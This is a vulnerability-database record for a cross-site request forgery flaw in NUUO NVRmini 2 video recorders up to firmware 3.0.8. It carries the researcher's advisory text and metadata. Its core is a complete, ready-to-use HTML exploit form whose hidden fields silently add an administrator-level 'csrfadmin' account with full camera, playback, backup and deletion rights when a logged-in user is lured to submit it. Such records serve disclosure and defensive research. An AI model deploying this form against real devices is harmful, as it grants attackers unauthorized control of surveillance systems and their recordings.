ID

VAR-E-201608-0094


EDB ID

40210


TITLE

NUUO NVRmini 2 3.0.8 - Cross-Site Request Forgery (Add Admin) - PHP webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 40210

DESCRIPTION

NUUO NVRmini 2 3.0.8 - Cross-Site Request Forgery (Add Admin).. webapps exploit for PHP platform

Trust: 0.6

sources: EXPLOIT-DB: 40210

AFFECTED PRODUCTS

vendor:nuuomodel:nvrminiscope:eqversion:23.0.8

Trust: 1.6

vendor:nuuomodel:add adminscope:eqversion:3.0.8

Trust: 0.5

sources: PACKETSTORM: 138221 // EXPLOIT-DB: 40210 // EDBNET: 87238

EXPLOIT

<!--

NUUO CSRF Add Admin Exploit

Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8 (NE-4160, NT-4040)

Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.

Desc: The application interface allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests. This can be
exploited to perform certain actions with administrative privileges if a logged-in
user visits a malicious web site.

Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2016-5349
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5349.php

14.01.2016

-->

<!-- 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 -->
<html>
<body>
<form action="http://10.0.0.17/users_xml.php">
<input type="hidden" name="&#95;password2" value="admin" />
<input type="hidden" name="addusername" value="csrfadmin" />
<input type="hidden" name="password" value="admin" />
<input type="hidden" name="cmd" value="adduser" />
<input type="hidden" name="group" value="poweruser" />
<input type="hidden" name="displaygroup" value="power&#32;user" />
<input type="hidden" name="magic" value="574" />
<input type="hidden" name="liveacc" value="1&#44;2&#44;3&#44;4&#44;5&#44;6&#44;7&#44;8&#44;9&#44;10&#44;11&#44;12&#44;13&#44;14&#44;15&#44;16" />
<input type="hidden" name="pbacc" value="1&#44;2&#44;3&#44;4&#44;5&#44;6&#44;7&#44;8&#44;9&#44;10&#44;11&#44;12&#44;13&#44;14&#44;15&#44;16" />
<input type="hidden" name="ptzacc" value="1" />
<input type="hidden" name="ioacc" value="1" />
<input type="hidden" name="backupacc" value="1" />
<input type="hidden" name="deleteacc" value="1" />
<input type="hidden" name="emapeacc" value="1" />
<input type="hidden" name="remotalkacc" value="1" />
<input type="hidden" name="logacc" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Trust: 1.0

sources: EXPLOIT-DB: 40210

EXPLOIT LANGUAGE

html

Trust: 0.6

sources: EXPLOIT-DB: 40210

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 40210

TYPE

Cross-Site Request Forgery (Add Admin)

Trust: 1.0

sources: EXPLOIT-DB: 40210

TAGS

tag:exploit

Trust: 0.5

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 138221

CREDITS

LiquidWorm

Trust: 0.6

sources: EXPLOIT-DB: 40210

EXTERNAL IDS

db:ZSLid:ZSL-2016-5349

Trust: 2.7

db:EXPLOIT-DBid:40210

Trust: 1.6

db:EDBNETid:87238

Trust: 0.6

db:EDBNETid:87254

Trust: 0.6

db:PACKETSTORMid:138221

Trust: 0.5

sources: PACKETSTORM: 138221 // EXPLOIT-DB: 40210 // EDBNET: 87238 // EDBNET: 87254

REFERENCES

url:http://www.zeroscience.mk/en/vulnerabilities/zsl-2016-5349.php

Trust: 1.0

url:https://www.exploit-db.com/exploits/40210/

Trust: 0.6

url:https://www.intelligentexploit.com

Trust: 0.6

sources: EXPLOIT-DB: 40210 // EDBNET: 87238 // EDBNET: 87254

SOURCES

db:PACKETSTORMid:138221
db:EXPLOIT-DBid:40210
db:EDBNETid:87238
db:EDBNETid:87254

LAST UPDATE DATE

2022-07-27T09:18:33.248000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:138221date:2016-08-06T19:04:18
db:EXPLOIT-DBid:40210date:2016-08-06T00:00:00
db:EDBNETid:87238date:2016-08-07T00:00:00
db:EDBNETid:87254date:2016-08-07T00:00:00